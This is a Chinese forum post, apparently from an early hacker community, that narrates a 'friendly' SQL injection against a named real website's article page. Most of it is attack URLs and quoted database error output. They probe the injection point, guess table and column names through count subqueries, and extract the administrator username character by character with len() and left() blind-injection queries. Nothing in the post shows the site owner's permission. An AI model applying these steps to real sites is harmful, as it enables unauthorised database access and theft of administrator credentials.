对中国黑客联盟的二次渗透
好久没能上网,身体也好的差不多了。抽空来溜溜。倒~中国黑客联盟([url]www.chinahacker.com[/url])不敢相信!!找找资料,哇。还真是的!晕了~去联盟首页看看,说是SQL INJECTION攻击的。大家还记得我以前写的关于中国黑客联盟的入侵过程吗?谈到了可以注射,但是管理页是放在内网了的。那注射联盟是怎样实现的呢?好象是IIS那里吧,日志没办法删除……
既然说了联盟可以注射,那我们就来试试吧~
跟KENDER谈了一会。友情检测开始!
首先找注射点:
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144[/url]
[Copy to clipboard]
第一步,看看是否存在
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144[/url]'
[Copy to clipboard]
返回:
QUOTE:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。
/article/list.asp,行29
晕死。来!
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%201=1[/url]
[Copy to clipboard]
QUOTE:
Microsoft VBScript 运行时错误 错误 '800a01f4'
变量未定义: 'reponse'
/article/list.asp,行72
是VBS结合SQL的,我们就先承认这就是正常页面,继续!
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%201=2[/url]
[Copy to clipboard]
QUOTE:
Microsoft VBScript 运行时错误 错误 '800a01f4'
变量未定义: 'reponse'
/article/list.asp,行72
怎么回事?这时候可以用一种逆向思维假定这就是VBS的效果吧。继续
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20(select%20count([/url]*)%20from%20admin)>=0
[Copy to clipboard]
返回:
QUOTE:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e37'
[Microsoft][ODBC SQL Server Driver][SQL Server]对象名 'admin' 无效。
/article/list.asp,行29
看来是表名不对。正常返回代表存在admin表名。如果不存在可以换其他的表名 比如admin_user 这些。尝试到为止。假如碰到一些其他的站点表名有点表态的可以考虑放弃吧。
不知道是不是今天的运气好,我第三次就猜出来了
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20(select%20count([/url]*)%20from%20article)>=0
[Copy to clipboard]
返回:
QUOTE:
Microsoft VBScript 运行时错误 错误 '800a01f4'
变量未定义: 'reponse'
/article/list.asp,行72
接着猜列名:
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20(select%20count(name)%20from%20article)[/url]
[Copy to clipboard]
返回:
QUOTE:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]列名 'name' 无效。
/article/list.asp,行29
正常返回代表存在article表名里存在name列名。如果不存在可以换其他的列名尝试。比如ID。
列名比较常规:USER
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20(select%20count(user)%20from%20article)[/url]
[Copy to clipboard]
返回:
QUOTE:
Microsoft VBScript 运行时错误 错误 '800a01f4'
变量未定义: 'reponse'
/article/list.asp,行72
接着是看看密码的列名如pass,password……这里不在多说
现在开始猜测管理员帐号,密码字符长度
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20len((select%20top%201%20user%20from%20article))[/url]>1
[Copy to clipboard]
top 1 是代表第1个用户你;>1 这里的1是代表探测字符长度为1
确定了长度后就是猜字符是啥
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20left((Select%20top%201%20user%20from%20article)[/url],1)=a
[Copy to clipboard]
变换A,一直猜下去。猜出来为止
最后是密码。……
这次就作为一个探讨,因为内网你进不去,哈哈,还有,管理页已经删除了。自己本地SQL执行?8可能,后台你都不知道他的结构。
CODE:
[url]http://www.chinahacker.com/article/list.asp?id=1144%20and%20len((select%20top%202%20user%20from%20article))[/url]>1
[Copy to clipboard]
QUOTE:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]子查询返回的值多于一个。当子查询跟随在 =、!=、<、<=、>、>= 之后,或子查询用作表达式时,这种情况是不允许的。
/article/list.asp,行29
页:
[1]